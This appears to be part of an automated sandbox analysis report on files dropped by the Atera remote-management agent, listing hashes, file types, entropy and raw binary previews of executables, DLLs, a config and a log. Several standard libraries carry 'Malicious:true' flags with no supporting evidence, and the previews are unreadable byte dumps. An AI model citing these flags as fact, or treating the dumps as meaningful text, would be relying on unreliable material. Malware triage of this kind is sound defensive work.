                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):639
                                                                                                                                                                                                                                        Entropy (8bit):4.7319244448977775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:M17IytXEO17Iy6XEOMrDT1m4ECuZDQ14Qgl1F10r6l1671Dr6l1671n4gl1Q:GttXXtWqm4E84QCH0E65DE654CQ
                                                                                                                                                                                                                                        MD5:9A64C59AB0C91FA9CF86FDB6B80443C6
                                                                                                                                                                                                                                        SHA1:23B69CFEAA5B651780718D61D7FD0D7624D5E0A9
                                                                                                                                                                                                                                        SHA-256:4812DF8DED980A451318C07C4811F7FA1D1D6956DFC766F25A55CBA28A5B24E3
                                                                                                                                                                                                                                        SHA-512:76247AAC0348F08A7E22DFE21AE45A8A8F9056677B1F98A36BE3A464B92FEB2C8B470CB028622E1A2CB4B59E44D5B4049D23A8C5671618B82DC8B58616E160D8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:02/10/2024 11:20:27 In Program static constructor, before instantiating _logger02/10/2024 11:20:27 In Program static constructor, after instantiating _logger without using _logger02/10/2024 11:20:28 Starting Main(), logging without using _logger..02/10/2024 11:20:28.277 am: Info: Before PollAll() call written at: 02/10/2024 11:20:28..02/10/2024 11:20:32.636 am: Info: In PollAll() before Poller.PollAll(false) written at: 02/10/2024 11:20:32..02/10/2024 11:20:32.652 am: Info: In PollAll() after Poller.PollAll(false) written at: 02/10/2024 11:20:32..02/10/2024 11:20:32.667 am: Info: After PollAll() call written at: 02/10/2024 11:20:32

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1246506
                                                                                                                                                                                                                                        Entropy (8bit):7.999702247108497
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Ony3ipTOpSfZauTZ0OH58yGrxiVj3WqHvYfUmanGGJFE:OnaSOpGoud0OHGliZWqH3bn/E
                                                                                                                                                                                                                                        MD5:E74D2A16DA1DDB7F9C54F72B8A25897C
                                                                                                                                                                                                                                        SHA1:32379AF2DC1C1CB998DC81270B7D6BE054F7C1A0
                                                                                                                                                                                                                                        SHA-256:A0C2F9479B5E3DA9D7A213EBC59F1DD983881F4FC47A646FFC0A191E07966F46
                                                                                                                                                                                                                                        SHA-512:52B8DE90DC9CA41388EDC9AE637D5B4CE5C872538C87CC3E7D45EDCF8EFF78B0F5743AB4927490ABDA1CFF38F2A19983B7CCC0FE3F854B0EACCA9C9CE28EDA75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....=O(Y..>.........3...AgentPackageMarketplace/AgentPackageMarketplace.exe....0.......>N......V.^.'....l....f.u*-Dl._.>.u.S.Pl-6.;...].#.S.X..7./...."...Z.....M.$`.,..{....v...B.Q.M7.j4.'.C.G`<s.X.%.....,...<bdR....N....!.$J@.k...55....>1..(P&..-.#p.NwuV=Wb...a....-....q.!.s.LH..(...:..#7...L.7.$6.C.uy....&I.r..e...,w0o.....`.....[.{cg=]..IBiQq.`.X.D.h.......G./..NA.....46....w.....b9rp.J.C*.2.F.....G...~..q.x....u......l..I..b..z..w..v.d!./..U.Y^..J..k<kUo:.n:.W......g$..<.X.>....rQ.5JiJ.+..|.p......C......o/...K......T.....+9..z.."..Yd.f..&.B..QWu.-.@...c4.T.^...#.E...v...B..\.x0..{..."|.a.?.y.......-..W.........8nk.).$sf.2].c>...`....=...0..$.bp...Oh....8x.-.%N/...w.........i....a.QX0.k..k..f..D.vl.f.Q..3....]....$.4..k..y.../...'...a..C.x...@..".8....9...;..&j..G#f......).....l......Y..7.c....PJ...X...^)s[...{.......Jr.Q..+....N.F.I...%OS...=.......5......i....h..(....r..T-ir.=.+.'..'.......r...[..J...l.P....[.q...,.To..h.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37936
                                                                                                                                                                                                                                        Entropy (8bit):6.42035670242574
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:GlK72yzFcoUzzxYeHTxwx6/ufD/EpYinAMxCoG:3e9YeHVwYe47Hx6
                                                                                                                                                                                                                                        MD5:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                        SHA1:C94D106BBA77AECF88540807DA89349B50EA5AE7
                                                                                                                                                                                                                                        SHA-256:30271D8A49C2547AB63A80BC170F42E9F240CF359A844B10BC91340444678E75
                                                                                                                                                                                                                                        SHA-512:3594955AD79A07F75C697229B0DE30C60C2C7372B5A94186A705159A25D2E233E398B9E2DC846B8B47E295DCDDD1765A8287B13456C0A3B3C4E296409A428EF8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!............."...0..`............... ........@.. ..............................P.....`.................................Q...O....................l..0(...........~..8............................................ ............... ..H............text...._... ...`.................. ..`.rsrc................b..............@..@.reloc...............j..............@..B........................H....... 5...I...........................................................0..H........(......}......}......~D...%-.&~C.....j...s....%.D...(...+}.......}....*.0.._........{....-.r...ps....z.{....o.....i./2.{....r+..pr...p.{....o....(....(....o.............{....o........:...%.. ..o...........i.0..+......{.....o....-2.{....r...pr...p.{....o....(....(....o............{.....o.....o....o .....-.....ws....%.{....o!...o"...%.{....o#...o$...%.o.......E...{....%-.&.+.(....%-.&.+..(...+

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1295
                                                                                                                                                                                                                                        Entropy (8bit):5.018953579697613
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdArdEtPF7NhOXrRH2/BLVv+13vH2/nVQ7uH2/FV0PH2/+w39y:3Ar+z7O7Rgdp+1/gnSagFsg+w3w
                                                                                                                                                                                                                                        MD5:843D2196B96E53ABCAE6F4C243D1A7A6
                                                                                                                                                                                                                                        SHA1:EB28441616660FD53653999595A3309961AA9A54
                                                                                                                                                                                                                                        SHA-256:175C1EBF4B5C56563944E65C9E8AE4595730155D69854499DB638E82E16DF056
                                                                                                                                                                                                                                        SHA-512:2C24DA122963E1BF533FD8A5C841C9BCD86442E0E49D3BE379FBB21AA607FDC6C7D30BA5573615416D55538429652BF1108D88EC8267FDC5D8C8F9ECAF11D0A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                        MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                        SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                        SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                        SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.6

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190700491174632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxBg:h2bYbYSWd85I5sSakFQhHL8/g
                                                                                                                                                                                                                                        MD5:266A4736FE6DFEADBC40C66AF39D3871
                                                                                                                                                                                                                                        SHA1:D090E63810691F78F760E55640B81958BC715183
                                                                                                                                                                                                                                        SHA-256:4D6091013BF285AF05D901BA130E86D8CEFDB4E387540C3814929C1277C2DDF8
                                                                                                                                                                                                                                        SHA-512:AB43966CEFC08A8FE9B7A1787948F55A73B243CA6DE7259FD42E5BD4ABAE61D562C9642770708BA38AB6118D3755741529ED51E7DB2A8A811BE8B876F2922A8B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.998846079851237
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GiLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7Hxlv:LZ0PMcjrgv
                                                                                                                                                                                                                                        MD5:C6339BD38794C9EB831004955DE64D16
                                                                                                                                                                                                                                        SHA1:EAE04876F94347538735F853B7F14778CB75180F
                                                                                                                                                                                                                                        SHA-256:855D0323807390D8F499355D0030685FBD6DC6939218A15059CB3E9C744AB1A4
                                                                                                                                                                                                                                        SHA-512:F62F76F305285F1C206AEFB8418E48BD2074DEC768C16986353305F34D17524E9A9AEA29AAE11B0D927247161F21039933B3EA68F2BC7F40623B471E123B33F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ...............................+....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.408406581403349
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:hQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxCl5E:h9MYn1seLE8JFMLcyMH7Hx+E
                                                                                                                                                                                                                                        MD5:7F8418A330DA75F653CC1A50F0B91175
                                                                                                                                                                                                                                        SHA1:7448DCCCDB8FBB1CC827FFE4861C7BD529EE85F5
                                                                                                                                                                                                                                        SHA-256:BF780EB84424039CAB84C818D21A402369EC1BDC9136E1CDBB60486343A07723
                                                                                                                                                                                                                                        SHA-512:3CAC7066B3F210D826383CA000CDC581C0CA193800C97F2F34C6139BB4880A12A485604344EF22BADFD4609F2A0E7645E81DECFA8C5BF8C6DF4406BFEE6DBFDA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ....................................`.....................................O.......4...............0(..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):354352
                                                                                                                                                                                                                                        Entropy (8bit):6.1536791121281995
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:4r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYyD:4hpp9xxIBeXGfvYyD
                                                                                                                                                                                                                                        MD5:697D8BC281B58B1FCEEC721B9BC01059
                                                                                                                                                                                                                                        SHA1:DA468B41FDADE096896B6835645DEFF110F438F5
                                                                                                                                                                                                                                        SHA-256:82C4EFE948B812C844DE4950130C292CDC49EDA42F447E17DE6CC451A1F5135E
                                                                                                                                                                                                                                        SHA-512:95877A2E690E083B256F71E376BE757FA0D329A6AAEC193461D325C63867BCE9E72A648EDB17A8817198C5224853541C65F664A6FFB966AE35D9E558F681EF46
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ...................................`..................................W..O....`...............@..0(..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071511091364285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:m1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ0:m1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                        MD5:1A5AE803BFFDEBA6B4D9825233D1C23C
                                                                                                                                                                                                                                        SHA1:E324D9B2F417F46FE3364658429B620BC5942322
                                                                                                                                                                                                                                        SHA-256:2BED7E5890D572E41770C422C25CF11F0D3C2D170C5F38F8EB1535E1A3E614C6
                                                                                                                                                                                                                                        SHA-512:D8DCB1E227AD001A2F43C9847E0A22D43DBE7021814AB88DBD168092A3C172D17CB69848F743166E755DB771B55025664C0E53580B9E48252B1581AD281E332A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................q....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):702512
                                                                                                                                                                                                                                        Entropy (8bit):5.943194897994663
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3f9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH3:vXNL2PVh6B+BzjmcX
                                                                                                                                                                                                                                        MD5:F78DB2C6B247E0FFC215A44AE88178D8
                                                                                                                                                                                                                                        SHA1:12FB14AE1CF731115F07076AD939A2ACC57A9920
                                                                                                                                                                                                                                        SHA-256:1DFF434970F52326AA5E0C1164AB76A771A1EE651E37166DF8A3BC3F06204746
                                                                                                                                                                                                                                        SHA-512:AF3F67FA56CA89111E389DE17F9030D979827E8B60AF86E991115B07759D6DADA1B74ED870B5163474192BF58A5FA69EBFB03DFCF087EB88E1E72EC26BB578CB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ....................................`.....................................O.......................0(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........z..<&..................<.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{[....3...{Z......(....,...{Z...*..{\.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):285744
                                                                                                                                                                                                                                        Entropy (8bit):6.190004154231823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:uZAWecOmop6I4A9YzsRuBeXirS9/pcRykxxNKKV6S8mSrpsPngH:uZeZ6ANRIru9/pcMkoKV64SrWA
                                                                                                                                                                                                                                        MD5:2CD03F275D3BB90B106632F203DCAF64
                                                                                                                                                                                                                                        SHA1:025C716D6B123FA03DC9F97D4BF77D4AF20B75AE
                                                                                                                                                                                                                                        SHA-256:B90619EBE88644BDA995505BDE5D5E282403E27FF7A55E273CC2FF9ACC88300A
                                                                                                                                                                                                                                        SHA-512:321660D33F6126077D4DC04AFBB341B9D46D07E2B38CF45F1C7B2C8B60A58A3F008390EE6F8B6995BECF4B0EADF66C9263D4BE67C8269F9A0851207650B9632D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....O..........." ..0..*...........H... ...`....... ....................................`..................................H..O....`..L............4..0(...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H.......Hd......................LG......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117448325022863
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:/ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH9:Bgo0WPVTXgd
                                                                                                                                                                                                                                        MD5:BF59A9BBF620C0F06ED79180C868FCE0
                                                                                                                                                                                                                                        SHA1:2E8F9EF7A105A951790344A3B9ADC61DB35ABAAD
                                                                                                                                                                                                                                        SHA-256:CEBDB552DAC9E136F87E37A461B7683934F00AA2A74FBA15BC53ADFA38F1B79E
                                                                                                                                                                                                                                        SHA-512:C472376BD7A0E532CB8FDDA7ADDB00FB973D30F97368460929E8352C16BCB17EA92264C81E1E1E084566172ECE3D1513073D24B01990A808335D0C040039C6D3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ..............................\.....`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.678227546122444
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Xy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqq/dW:XuhMaVmzDC67EpYinAMxCwk
                                                                                                                                                                                                                                        MD5:181F16CCEBD4B02ACE42A02CC536ACA9
                                                                                                                                                                                                                                        SHA1:84795DA0255E288C96AC64F1C8150E81E0289FFD
                                                                                                                                                                                                                                        SHA-256:80582DBDE89A6D9906721AD27562C7B2BEDE7048E4D461828D3BA2C4438E58E9
                                                                                                                                                                                                                                        SHA-512:73F93A3F4538FCE421A453B5A90AC662CC58D5A846AFECB8E337F33A1D643A81C8D02F5F3AECAE4CF00828A3103C63614F086E92ABD262317B13CF608784D72A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
